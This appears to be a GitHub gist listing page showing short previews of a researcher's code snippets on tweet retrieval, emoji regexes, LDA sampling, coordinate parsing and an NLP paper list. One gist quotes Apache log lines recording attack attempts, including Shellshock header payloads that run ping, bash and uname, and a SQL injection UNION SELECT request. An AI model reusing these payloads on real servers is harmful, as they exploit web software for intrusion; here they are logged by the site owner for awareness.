This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
r""" | |
stdin: IDs of tweets to get (whitespace or line separated) | |
stdout: the tweets as two-column TSV: ID \t TweetJSON | |
This retrieves tweets using the API. | |
If there was an error when retrieving a message - most prominently, if the | |
message is now deleted -- the error information is saved as JSON. Therefore | |
there should be exactly as many output lines as there are input IDs. |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# -*- encoding: utf-8 -*- | |
# actually that encoding line is NOT important codewise. only for doc purposes. | |
""" | |
Detect emoji or other emoji-like things in Python. | |
The regular expressions here can be used to either identify emoji or to remove it. | |
The comments are written from the perspective of removing it. | |
The regexes get some stuff besides emoji. | |
by Brendan O'Connor (http://brenocon.com) 2016-10-20 | |
originally written as part of https://arxiv.org/abs/1608.08868 |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
# by brendan o'connor (http://brenocon.com) written in early 2012 | |
# parallelized collapsed gibbs sampling for LDA with threads in cython | |
# need to delete these lines to get the cython instructions to work... | |
#cython: boundscheck=False, cdivision=True | |
# vim:sts=4:sw=4 | |
import numpy as np | |
cimport numpy as np | |
cimport cython | |
cimport openmp |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
For example for data looking like | |
qwerasdvzxcasdf 0.62s user 18.55s system 92% cpu 20.678 total | |
asdfasdf 838.56s user 10.75s system 100% cpu 14:08.98 total | |
acvzxcvzxcv 3:15:12.2 total | |
asdfadsf 0.22s user 6.24s system 0% cpu 16:01.30 total | |
output those 4 numbers in seconds | |
20.678 |
Loading
Sorry, something went wrong. Reload?
Sorry, we cannot display this file.
Sorry, this file is invalid so it cannot be displayed.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import sys,os,re,json | |
from hose_util import iterate, lookup | |
# import geodb | |
# country_db = geodb.GeoDB.load_geojson_files(['/home/brenocon/geocode/tm_world_borders-0.3.json']) | |
OneCoord = r'([-+]?\d{1,3}\.\d{3,})' | |
Separator= r', ?' | |
LatLong = re.compile(OneCoord + Separator + OneCoord, re.U) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/env python | |
import ujson as json | |
import time,sys | |
from datetime import datetime | |
def parse_date(twitter_lame_datetime_string): | |
# e.g. the 'created_at' field | |
ts = time.strptime(twitter_lame_datetime_string, "%a %b %d %H:%M:%S +0000 %Y") | |
return datetime(*ts[:7]) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
Shellshock attack attempts I noticed in apache logs, from grep '()' ... the shellshock-scan one I think I initiated but I think the rest are attack attempts. | |
209.126.230.72 - - [24/Sep/2014:22:55:07 -0400] "GET / HTTP/1.0" 301 - "() { :; }; ping -c 11 209.126.230.74" "shellshock-scan (http://blog.erratasec.com/2014/09/bash-shellshock-scan-of-internet.html)" | |
94.228.220.68 - - [25/Sep/2014:01:17:15 -0400] "GET /index.php?option=com_artforms&task=vferforms&id=1+UNION+SELECT+1,2,3,4,5,group_concat(0x3C6B65793E,version(),0x3C6B6579733E)-- HTTP/1.1" 200 31516 "-" "-" | |
89.207.135.125 - - [25/Sep/2014:06:59:58 -0400] "GET /cgi-sys/defaultwebpage.cgi HTTP/1.0" 404 302 "-" "() { :;}; /bin/ping -c 1 198.101.206.138" | |
198.20.69.74 - - [25/Sep/2014:17:14:32 -0400] "GET / HTTP/1.1" 301 - "() { :; }; /bin/ping -c 1 104.131.0.69" "() { :; }; /bin/ping -c 1 104.131.0.69" | |
54.251.83.67 - - [26/Sep/2014:15:55:50 -0400] "GET / HTTP/1.1" 301 - "-" "() { :;}; /bin/bash -c \"echo testing9123123\"; /bin/uname -a" | |
114.91.105.103 - - |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
~ % cat bla | |
digraph A { | |
0 [label = "hello\\"] | |
} | |
~ % dot -Tpdf bla > out.pdf | |
===> http://brenocon.com/20141005_dot.pdf |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
NLP and source code papers, very scattered and partial listing | |
(collected by Nathan Schneider and Brendan O'Connor) | |
ICML 2014 | |
Maddison and Tarlow | |
Structured Generative Models of Natural Source Code | |
http://jmlr.org/proceedings/papers/v32/maddison14.pdf | |
ACL 2013 |